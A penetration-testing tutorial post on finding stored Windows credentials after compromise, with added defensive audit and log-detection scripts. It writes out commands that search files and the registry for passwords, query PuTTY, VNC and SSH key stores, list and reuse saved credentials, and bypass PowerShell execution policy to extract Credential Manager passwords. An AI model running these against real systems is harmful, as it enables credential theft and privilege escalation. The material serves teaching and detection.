
Windows Credentials Enumeration

In this post we will discuss some low-hanging credential file enumeration. Assume that you have already compromised the target machine and are now searching for credential files that let you escalate your privileges.

Low Hanging Credentials

dir /b /a /s c:\ > cdir.txt


Ah! What does this mean?

It lists every file under C:\ (bare format, all attributes, recursing into subdirectories) and saves the listing to cdir.txt.


Instead of going through all of those files by hand, we search the listing for the substring passw (case-insensitive) in any file name.

type cdir.txt | findstr /i passw


We are lucky enough to find something here, but obviously this was all set up for the lab. Still, sometimes you will find real low-hanging fruit: not exactly like this, but an Excel spreadsheet or some other document that an admin mistakenly saved on the desktop or elsewhere.


Look for these target files

install, backup, .bak, .log, .bat, .cmd, .vbs, .cnf, .conf, .config, .ini, .xml, .txt, .gpg, .pgp, .p12, .der, .csr, .cer, id_rsa, id_dsa, .ovpn, .rdp, vnc, ftp, ssh, vpn, git, .kdbx, .db
unattend.xml
Unattended.xml
sysprep.inf
sysprep.xml
VARIABLES.DAT
setupinfo
setupinfo.bak
web.config
SiteList.xml
.aws\credentials
.azure\accessTokens.json
.azure\azureProfile.json
gcloud\credentials.db
gcloud\legacy_credentials
gcloud\access_tokens.db
type cdir.txt | findstr /i vnc  # search the listing for a file name containing "vnc"
type c:\Users\IEUser\Downloads\ultravnc.ini | findstr /i passw  # search for the string inside that particular file
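The two checks above (file names that match the target list, then file contents that mention "passw") can be scripted so a defender can audit a host for exposed credential files before an attacker does. The following Python script is an added example, not code from the original post: it walks a directory tree the way dir /s does, applies the post's name list, and greps small text files for "passw". The sample tree it builds is constructed here purely for the demonstration.

```python
"""Audit a directory tree for low-hanging credential files.

Added example (not from the original post): a defender-side self-audit that
applies the same two checks the post runs by hand with dir + findstr:
  1. file names matching the post's list of sensitive name fragments
  2. small text files whose content contains "passw"
The sample tree built by build_sample_tree() is constructed for this demo.
"""
import os
import re
import tempfile
from pathlib import Path

# Name fragments from the post's target-file list (matched case-insensitively).
NAME_FRAGMENTS = [
    "install", "backup", ".bak", ".log", ".bat", ".cmd", ".vbs", ".cnf",
    ".conf", ".config", ".ini", ".xml", ".txt", ".gpg", ".pgp", ".p12",
    ".der", ".csr", ".cer", "id_rsa", "id_dsa", ".ovpn", ".rdp", "vnc",
    "ftp", "ssh", "vpn", "git", ".kdbx", ".db",
]
# Exact names the post calls out (unattend/sysprep leftovers, cloud CLI caches).
EXACT_NAMES = {
    "unattend.xml", "unattended.xml", "sysprep.inf", "sysprep.xml",
    "variables.dat", "setupinfo", "setupinfo.bak", "web.config",
    "sitelist.xml", "credentials", "accesstokens.json", "azureprofile.json",
    "credentials.db", "legacy_credentials", "access_tokens.db",
}
CONTENT_PATTERN = re.compile(r"passw", re.IGNORECASE)
MAX_CONTENT_BYTES = 1_000_000  # skip large files instead of reading them fully


def name_is_suspicious(name: str) -> bool:
    """True when the file name matches the post's target-file list."""
    lower = name.lower()
    return lower in EXACT_NAMES or any(frag in lower for frag in NAME_FRAGMENTS)


def content_mentions_password(path: Path) -> bool:
    """True when a small text file contains 'passw' (like findstr /i passw)."""
    try:
        if path.stat().st_size > MAX_CONTENT_BYTES:
            return False
        text = path.read_text(encoding="utf-8", errors="ignore")
    except OSError:
        return False
    return CONTENT_PATTERN.search(text) is not None


def audit_tree(root: str) -> dict:
    """Walk root like `dir /s` and return both finding lists, relative to root."""
    root_path = Path(root)
    findings = {"by_name": [], "by_content": []}
    for dirpath, _dirs, files in os.walk(root_path):
        for fname in files:
            path = Path(dirpath) / fname
            # Report Windows-style relative paths regardless of host OS.
            rel = str(path.relative_to(root_path)).replace(os.sep, "\\")
            if name_is_suspicious(fname):
                findings["by_name"].append(rel)
            if content_mentions_password(path):
                findings["by_content"].append(rel)
    findings["by_name"].sort()
    findings["by_content"].sort()
    return findings


def build_sample_tree() -> str:
    """Create a constructed sample tree resembling the post's lab host."""
    root = tempfile.mkdtemp(prefix="credaudit_")
    samples = {  # constructed sample files, not real data
        "Users/IEUser/Downloads/ultravnc.ini": "[ultravnc]\npasswd=ABCDEF\n",
        "Users/IEUser/Desktop/notes.md": "shopping list\n",
        "Windows/Panther/unattend.xml": "<unattend><Password>x</Password></unattend>\n",
        "Program Files/app/readme.rtf": "nothing here\n",
    }
    for rel, content in samples.items():
        p = Path(root) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content, encoding="utf-8")
    return root


if __name__ == "__main__":
    result = audit_tree(build_sample_tree())
    for kind, paths in result.items():
        print(kind)
        for rel in paths:
            print("   ", rel)
```

Run against a real root (for example C:\ on a Windows host, or a mounted image) by calling audit_tree with that path; the name list is deliberately broad, so expect noise from ".log", ".txt" and "git" and review the by_content hits first.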



Registry Enumeration

The registry, or Windows registry, is a database of information, settings, options, and other values for software and hardware. It also contains stored passwords for session-based applications, and even SSH keys if the system is using SSH.

HKLM (HKEY_LOCAL_MACHINE) :- Contains computer-specific information about the installed hardware, software settings, and other information. This information applies to all users who log on to that computer. This key and its subkeys are among the areas of the registry most frequently viewed and edited by users.

HKCU (HKEY_CURRENT_USER) :- Contains the settings of the user who is currently logged in to Windows.

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

It queries the specific registry key that holds PuTTY sessions, to check whether any stored credentials can be used for further enumeration.


As we can see, we have found credentials in the Local session of PuTTY.

We can also search the registry for a specific string, just as we did above with the files:

reg query HKLM /f password /t REG_SZ /s


reg query "HKCU\Software\ORL\WinVNC3\Password"  # for the WinVNC server
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"  # for PuTTY sessions
reg query "HKCU\Software\OpenSSH\Agent\Keys"  # if the system is using SSH
reg query HKLM /f password /t REG_SZ /s  # for searching a specific string

We can also run reg query HKLM /f credentials /t REG_SZ /s, or substitute any other string we want to search for.


Extracting Password from Credential manager

What is Credential manager

Credential Manager lets you view and delete your saved credentials for signing in to websites, connected applications, and networks. To open Credential Manager, type credential manager in the search box on the taskbar and select Credential Manager Control panel.

But it only shows you the option to change a password; you cannot view the password itself.


Web Credentials shows the passwords stored by Internet Explorer/Microsoft Edge.


The other tab shows the passwords stored for your local system.

During a pentest it is not always the case that you will have a UI/RDP session on the target machine, so we have to use the command line to make use of the credentials stored in Credential Manager.

cmdkey /list  # lists all the stored credentials


runas /savecred /user:admin cmd.exe


This way you can only use the credentials stored in Credential Manager; you cannot view them. But we can extract the passwords with the PowerShell script shown below.

Extracting password

We will use this PowerShell script to extract the passwords from Credential Manager.

Powershell Script

powershell -ep bypass
. .\cms.ps1
Enum-Creds

OR

powershell import-module C:\unknown\LPE\cms.ps1 ; Enum-Creds
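Every command in the registry section and in this Credential Manager section (reg query with /f password, the PuTTY/VNC/OpenSSH key lookups, cmdkey /list and runas /savecred) leaves a process-creation record that a defender can alert on. The Python script below is an added example, not part of the original post: it applies a small set of detection rules to constructed process-creation records. The one-line log format (timestamp, host, user, cmd) is a simplification invented for this example; in practice the command line comes from the CommandLine field of Sysmon event 1 or Security event 4688.

```python
"""Flag the credential-hunting commands from the post in process-creation logs.

Added example (not part of the original post): a detection-side counterpart to
the registry and Credential Manager sections. The log format and the sample
records are constructed for this demo; only the command lines mirror the post.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern


# reg.exe may be logged bare, quoted or with a full path; allow an optional
# closing quote between the binary name and the "query" verb.
REG_QUERY = r'\breg(?:\.exe)?"?\s+query\b'

# Each rule mirrors one command family demonstrated in the post.
RULES = [
    Rule("reg_query_password_string",
         re.compile(REG_QUERY + r".*\s/f\s+(?:password|credential\w*)\b", re.I)),
    Rule("reg_query_putty_sessions",
         re.compile(REG_QUERY + r".*SimonTatham\\PuTTY\\Sessions", re.I)),
    Rule("reg_query_vnc_password",
         re.compile(REG_QUERY + r".*(?:WinVNC3\\Password|TightVNC\\Server)", re.I)),
    Rule("reg_query_openssh_agent_keys",
         re.compile(REG_QUERY + r".*OpenSSH\\Agent\\Keys", re.I)),
    Rule("cmdkey_list_saved_creds",
         re.compile(r"\bcmdkey(?:\.exe)?\s+/list\b", re.I)),
    Rule("runas_savecred",
         re.compile(r"\brunas(?:\.exe)?\b.*\s/savecred\b", re.I)),
]

# Constructed single-line record format: "<ts> host=<h> user=<u> cmd=<command line>"
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")

# Constructed sample records (not real telemetry).
SAMPLE_LOG = [
    r"2024-01-01T10:00:01Z host=WS01 user=CORP\ieuser cmd=reg query HKLM /f password /t REG_SZ /s",
    r'2024-01-01T10:00:02Z host=WS01 user=CORP\ieuser cmd="C:\Windows\System32\reg.exe" query "HKCU\Software\SimonTatham\PuTTY\Sessions"',
    r"2024-01-01T10:00:03Z host=WS01 user=CORP\ieuser cmd=cmdkey /list",
    r"2024-01-01T10:00:04Z host=WS01 user=CORP\ieuser cmd=runas /savecred /user:admin cmd.exe",
    r"2024-01-01T10:00:05Z host=WS01 user=CORP\ieuser cmd=notepad.exe C:\Users\ieuser\notes.txt",
    r"2024-01-01T10:00:06Z host=WS01 user=CORP\svc cmd=reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion /v ProgramFilesDir",
    r"2024-01-01T10:00:07Z host=WS01 user=CORP\ieuser cmd=reg query HKLM /f credentials /t REG_SZ /s",
    "this line is not a process record and is skipped",
]


def parse_line(line: str):
    """Return the record fields as a dict, or None for lines that do not parse."""
    m = LOG_LINE.match(line.strip())
    return m.groupdict() if m else None


def match_rules(command_line: str):
    """Names of every rule whose pattern matches the command line."""
    return [r.name for r in RULES if r.pattern.search(command_line)]


def scan(lines):
    """Return one alert per record that triggers at least one rule."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = match_rules(rec["cmd"])
        if hits:
            alerts.append({"ts": rec["ts"], "host": rec["host"],
                           "user": rec["user"], "rules": hits, "cmd": rec["cmd"]})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(a["ts"], a["user"], ",".join(a["rules"]), "|", a["cmd"])
```

The benign reg query against CurrentVersion is intentionally left unflagged: the rules key on the /f search flag and on the specific credential-holding keys rather than on reg query in general, which keeps false positives from administrative scripts low. Tune the user and host fields against your own baseline before alerting.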


This post is licensed under CC BY 4.0 by the author.